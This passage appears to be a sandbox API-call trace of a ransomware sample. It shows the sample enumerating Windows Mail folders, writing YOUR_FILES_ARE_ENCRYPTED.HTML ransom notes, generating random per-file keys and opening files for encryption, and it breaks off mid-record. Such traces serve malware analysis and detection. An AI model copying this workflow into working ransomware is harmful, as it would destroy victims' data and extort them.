hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827deb8e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x206000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0163.620] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 98 [0163.620] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.620] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.620] lstrlenW (lpString=".MSMessageStore") returned 15 [0163.620] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.620] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0163.620] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 87 [0163.621] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.621] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.621] lstrlenW (lpString=".pat") returned 4 [0163.621] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.621] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0163.621] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.621] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\old\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0163.626] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.653] CloseHandle (hObject=0x5b8) returned 1 [0163.654] GetProcessHeap () returned 0x270000 [0163.655] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.655] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="old", cAlternateFileName="")) returned 0 [0163.655] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.655] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0163.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.655] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.658] CloseHandle (hObject=0x58c) returned 1 [0163.658] GetProcessHeap () returned 0x270000 [0163.659] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.659] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0163.659] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 68 [0163.659] lstrcmpW (lpString1="edb.chk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.659] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0163.659] lstrlenW (lpString=".chk") returned 4 [0163.659] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0163.659] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.log", cAlternateFileName="")) returned 1 [0163.659] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 68 [0163.659] lstrcmpW (lpString1="edb.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.659] PathFindExtensionW (pszPath="edb.log") returned=".log" [0163.659] lstrlenW (lpString=".log") returned 4 [0163.659] PathFindExtensionW (pszPath="edb.log") returned=".log" [0163.659] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0163.660] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0163.660] GetProcessHeap () returned 0x270000 [0163.660] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0163.661] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="82") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="33") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="33") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="C4") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="72") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="BB") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="48") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="A0") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="AB") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="00") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8F") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="D1") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="28") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="6A") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="19") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="9B") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="C8") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="6E") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="23") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BC") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D9") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="BF") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="52") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="17") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="69") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="5A") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="D4") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="CD") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="AC") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="77") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="24") returned 2 [0163.663] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" [0163.663] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.663] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0163.663] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8287710f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0163.663] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 73 [0163.663] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.663] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.663] lstrlenW (lpString=".log") returned 4 [0163.663] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.663] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0163.710] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0163.710] GetProcessHeap () returned 0x270000 [0163.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0163.711] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="32") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="74") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="C0") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="43") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="44") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="A8") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="E4") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="4B") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="BE") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="73") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="FF") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="E9") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="09") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="82") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="85") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="31") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="FB") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="6F") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="62") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="F7") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="55") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="42") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="C8") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="20") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7A") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="7D") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="A5") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="44") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="04") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="81") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="2A") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="69") returned 2 [0163.713] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" [0163.713] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.713] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0163.715] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd250d350, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd250d350, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81d74b3a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0163.715] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 76 [0163.715] lstrcmpW (lpString1="edbres00001.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.715] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0163.715] lstrlenW (lpString=".jrs") returned 4 [0163.715] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0163.715] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81f89e7e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0163.715] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 76 [0163.717] lstrcmpW (lpString1="edbres00002.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.717] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0163.717] lstrlenW (lpString=".jrs") returned 4 [0163.717] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0163.717] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859db9ea, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x60, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0163.717] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 70 [0163.717] lstrcmpW (lpString1="oeold.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.717] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0163.717] lstrlenW (lpString=".xml") returned 4 [0163.717] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0163.717] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0163.755] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=260) returned 1 [0163.755] CloseHandle (hObject=0x58c) returned 1 [0163.756] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0163.756] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 71 [0163.756] GetProcessHeap () returned 0x270000 [0163.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.756] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0163.756] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*" [0163.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.758] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.759] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e4d104, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0163.759] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 81 [0163.759] lstrcmpW (lpString1="Bears.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.759] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0163.759] lstrlenW (lpString=".htm") returned 4 [0163.759] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0163.759] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.759] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=255) returned 1 [0163.759] CloseHandle (hObject=0x5b8) returned 1 [0163.759] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, 